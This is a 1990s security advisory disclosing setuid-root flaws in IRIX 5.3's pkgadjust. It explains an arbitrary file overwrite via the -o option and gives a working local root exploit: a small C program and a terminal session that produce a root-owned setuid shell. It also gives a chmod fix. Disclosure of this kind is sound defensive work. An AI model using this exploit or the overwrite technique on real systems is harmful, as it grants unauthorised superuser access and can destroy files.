There are many major security holes in SGI's package installation system for IRIX 5.3. The code appears to have been written without proper consideration of the implications of setuid. Any user can gain superuser access as well as overwrite-to-destroy files. The main program that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust, which is setuid root. PROGRAM. pkgadjust (from eoe2.sw.oampkg) AFFECTS. SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6. REQUIRED. Account on server RISK. superuser AUTHOR. Tung-Hui Hu --- PROBLEM 1. pkgadjust will allow any user to overwrite any file because it allows one to set via command line: -o write debugging output to rather than to stderr Since pkgadjust does not check for ownership, etc. this will destroy the file, leading to a denial of service/removal of authorization checks. --- PROBLEM 2. pkgadjust will allow any user to gain superuser access. One can set programs to list installed packages via command line options -a normally 'versions long' command line -b normally 'versions -v' command line This is trivially exploited: % cat > getroot.c int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; } % cc getroot.c -o getroot % cp /bin/sh sh % ls -la sh -rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh % /usr/pkg/bin/pkgadjust -f -a getroot scanning inst-database updating pkginfo-files ........................................^C % ls -la sh -rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh % panic --- FIX. # chmod 700 /usr/pkg/bin/pkgadjust DISCUSSION. No sermons here, but I really doubt the program was written for setuid. Since most users can't write to the lockfile in /var/sadm, many pkg* commands are unavailable. I also found these files improperly permissioned and would recommend removing setuid: -rwsr-xr-x 1 root sys 838 Sep 27 11:27 /usr/lib/X11/ app-defaults/ISDN -rws--x--x 1 root sys 18632 Sep 27 10:59 /usr/pkg/bin/abspath Tung-Hui Hu / '97 Comparative Literature / Princeton Universe hhui@stardot.com / the STATIC: http://www.stardot.com/~hhui/static